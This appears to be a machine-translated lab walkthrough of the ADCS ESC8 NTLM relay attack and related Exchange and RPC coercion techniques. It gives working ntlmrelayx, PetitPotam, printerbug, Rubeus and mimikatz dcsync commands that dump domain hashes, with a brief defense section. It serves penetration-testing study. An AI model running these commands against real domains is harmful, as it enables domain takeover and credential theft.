preface
ADCS ESC8, also known as ADCS Relay, is the most widely used hole in ADCS
adcs esc1-esc8 relevant: https://mp.weixin.qq.com/s/CG-kSHyWDnUERL4NGddiRw
Exploit reason: because ADCS of http The certificate interface is not enabled NTLM Relay protection, so it is vulnerable to NTLM Relay Attack. and Authorization HTTP The header explicitly allows only passing NTLM Authentication, so Kerberos The protocol cannot be used. Therefore, attackers can take advantage of NTLM Relay attack ADCS Certificate services.
1.adopt ntlm_relay,We got a machine A User authentication certificate 2.We pass Rubeus asktgt The function uses this certificate to AD launch kerberos authentication 3.We got TGT And request the name of the target machine TGS,Get permission
1, Add ADCS service
Add ADCS service
Select certification authority
Click Install directly
2, Configure ADCS service
Select Enterprise CA
Right click Copy template
Change the name to LDAPS
Right click Properties -- > request processing -- > export private key
Create a new template to issue
Apply for a new certificate
3, ADCS-ESC8 attack
PDC 192.168.184.217 BDC 192.168.184.216 (ADCS) Kali 192.168.184.135 server2012 192.168.184.238
(1) Find a certificate server by certificate
certutil -config - -ping certutil -ca
(2) ntlmrelayx listening
A new version of impacket is required( https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack)
sudo python3 ntlmrelayx.py -t http://192.168.184.216/certsrv/certfnsh.asp -smb2support --adcs
(3) Trigger back connection
Use the script to trigger the auxiliary domain control to connect back to our attack machine. Here, you can use the latest Petitpotam.py or printerbug.py
1.PetitPotam
python3 PetitPotam.py kali ip dc ip python3 PetitPotam.py 192.168.184.135 192.168.184.217
2. Printerbug (user account in the domain is required)
python3 printerbug.py mark/hacker@dcip kaliip python3 printerbug.py mark/hacker@192.168.184.217 192.168.184.135
(4)ntlmrelayx successfully performed the relay and obtained the certificate information
(5) Get domain management
With this certificate, you can directly use kekeo or rubeus to apply for tgt, so that you can dcsync
kekeo: base64 /input:on tgt::ask /pfx:xxx /user:DC01$ /ptt rubeus: Rubeus.exe asktgt /user:DC01$ /certificate:xxx /ptt
Using mimikatz, you can export any user hash in the domain
mimikatz.exe #Viewing kerberos tickets kerberos::list #Export krbtgt user's hash lsadump::dcsync /user:krbtgt /csv #Export intra domain hash lsadump::dcsync /all /csv /domain:mark.com
Pit stepping point:
(1) rubeus reported error 1
Solution: use Rubeus version 1.6.4
(2) rubeus error 2
KRB-ERROR (62) : KDC_ERR_CLIENT_NOT_TRUSTED
resolvent
Open group policy, computer configuration \ Windows settings \ security settings \ local policy \ security options, find and configure the encryption types allowed by Kerberos, and check all the following
After checking, restart to obtain TGT
Detection and defense
- If not, you can turn off the web endpoint of certificate services.
- You can delete the ntlm authentication in the iis configuration of the certsrv, the web endpoint we are relaying to, so that ntlm cannot be used for authentication and the relay attack is blocked.
4, About NTLM request [excerpt from evi1cg article]
(1) Passive trigger
The normal way is to construct a UNC path for our target to access, such as:
dir \\hostshare\xx
Or send an email with an image and a unc path, such as:
<img src="\\hostshare\xx">
Passive triggering is generally passive, and active triggering is generally used
(2) Active trigger
Most active triggers require that we have the account and password of members in the domain.
exchange
Exchange is a high-value target. By default, the Exchange Windows Permissions security group has writeDACL permission on the domain object of the domain in which exchange is installed, which means that we can enhance the permission. It is also possible to directly take domain control by using exchange.
1.cve-2018-8581
This vulnerability is essentially an SSRF vulnerability. The main cause of the vulnerability is that when accessing the user's' subscription 'in the underlying logic of exchange, the net NTLM hash of the system user will be used to access the target address. Therefore, a malicious server can be constructed to grab the net NTLM hash of the exchange server's system account, replay it and relay it to the administrator's permission.
utilize Relay To get the specified user directly Hash python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
2.cve-2019-1040
Use exchange vulnerability and printer bug vulnerability to relay and connect back
https://www.cnblogs.com/mrhonest/p/14187849.html# Vulnerability overview
1.The attacker turns on the relay impacket-ntlmrelayx --escalate-user chenli -t ldap://192.168.110.12 -smb2support --remove-mic --delegate-access -debug 2.Use printer vulnerability windows: spoolsample.exe exchangeIP Attack aircraft IP kali: python3 printerbug.py sync.net/chenli:cl123\!\@\#45@192.168.110.81 192.168.1.103
RPC utilization
1. Printer bug vulnerability
Microsoft officially considers it a normal business and does not provide a patch. Microsoft's spoolsv.exe registers a service and several RPCs. It allows authenticated users to call remotely. The function RemoteFindFirstPrinterChangeNotificationEx passes a unc path, and the printer service will request the unc path. Since the printer runs with system permission, we can access it The printer rpc forces the printer service to send a request to us, and the net NTLM hash obtained is the machine user hash.
python printerbug.py cgdomain.com/test:'1qaz@WSX'@10.211.55.201 10.211.55.2
2.PetitPotam
PetitPotam is a new rpc utilization method just released in July this year. After the patch was updated, many printing services were shut down. Some attackers have developed an rpc attack method through efs
Encrypted file system(EFS)It's Microsoft Windows stay NTFS3.0 A feature introduced in, which provides file system level encryption. This technology enables files to support transparent encryption to protect confidential data from attackers with physical access. EFS from Windows 2000 Start in all areas developed for the business environment Windows Available in version. The vulnerability exploits the Microsoft encrypted file system remote protocol( MS-EFSRPC,MicroSoft Encrypting File System Remote Protocol). MS-EFSRPC yes Microsoft The encrypted file system remote protocol is used to perform "maintenance and management operations" on encrypted data stored remotely and accessed through the network. Using this vulnerability, hackers can connect to LSARPC Force trigger target machine to send to specified remote server Net-NTLM Hash,So the attacker gets Net-NTLM Hash Can be carried out after NTLM Relay Attack to take over the entire domain. This vulnerability can be used to replace Printerbug. An attacker can use MS-EFSRPC Agreement will DC NTLM Relay credentials to Active Directory Certificate Services AD CS Web Register page to register DC Certificate to send its credentials to the domain controller
Similar to the previous printer bug, EFS's rpc allows malicious domain users and / or machine accounts to control outgoing authentication of other machines. SERVER2012 supports anonymous triggering, and server2016 above anonymous pipes are empty by default and need credentials to trigger
python Petitpotam.py -u sanfeng -p '1qaz@WSX' -d cgdomain.com 10.211.55.2 10.211.55.202
(3) Full patch case
If you install certificate services, you can use ADCS
Reference article:
https://evi1cg.me/archives/NTLMRelay.html
https://mp.weixin.qq.com/s/AmcC4DzmowbE3vQC0GYpag
https://mp.weixin.qq.com/s/1AjmiaDOIKbYIAu7VAwIQg